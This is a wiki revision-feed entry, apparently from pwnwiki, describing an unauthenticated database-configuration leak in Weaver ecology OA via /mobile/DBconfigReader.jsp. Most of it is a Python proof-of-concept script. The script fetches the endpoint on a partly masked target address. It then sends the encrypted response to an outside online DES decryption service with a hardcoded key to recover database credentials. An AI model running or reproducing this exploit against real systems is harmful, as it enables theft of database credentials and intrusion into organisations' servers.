https://pwnwiki.com/index.php?action=history&feed=atom&title=%E6%B3%9B%E5%BE%AEecology_OA%E6%95%B8%E6%93%9A%E5%BA%AB%E9%85%8D%E7%BD%AE%E4%BF%A1%E6%81%AF%E6%B4%A9%E9%9C%B2%2Fzh-hant
泛微ecology OA數據庫配置信息洩露/zh-hant - Revision history
2026-04-11T01:01:00Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=%E6%B3%9B%E5%BE%AEecology_OA%E6%95%B8%E6%93%9A%E5%BA%AB%E9%85%8D%E7%BD%AE%E4%BF%A1%E6%81%AF%E6%B4%A9%E9%9C%B2/zh-hant&diff=6758&oldid=prev
Pwnwiki: Created page with "泛微ecology OA數據庫配置信息洩露"
2021-07-10T07:31:30Z
<p>Created page with "泛微ecology OA數據庫配置信息洩露"</p>
<p><b>New page</b></p><div><languages /><br />
==利用前提==<br />
/mobile/DBconfigReader.jsp存在未授權訪問。<br />
<br />
==POC==<br />
<pre><br />
import base64<br />
import requests<br />
import ast<br />
<br />
def req(url):<br />
headers = {<br />
'Content-Type':'application/x-www-form-urlencoded',<br />
'User-Agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36',<br />
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',<br />
}<br />
<br />
r1 = requests.get(url,headers=headers).content<br />
s = r1.replace('\r\n','')<br />
res1 = base64.b64encode(s)<br />
<br />
postdata = {<br />
'data':res1,<br />
'type':'des',<br />
'arg':'m=ecb_pad=zero_p=1z2x3c4v_o=0_s=gb2312_t=1'<br />
}<br />
u = 'http://tool.chacuo.net/cryptdes'<br />
r2 = requests.post(u,data=postdata,headers=headers).content<br />
res2 = ast.literal_eval(r2)<br />
<br />
return res2['data']<br />
<br />
url = 'http://58.2xxx:8888//mobile/DBconfigReader.jsp'<br />
print req(url)<br />
</pre></div>
Pwnwiki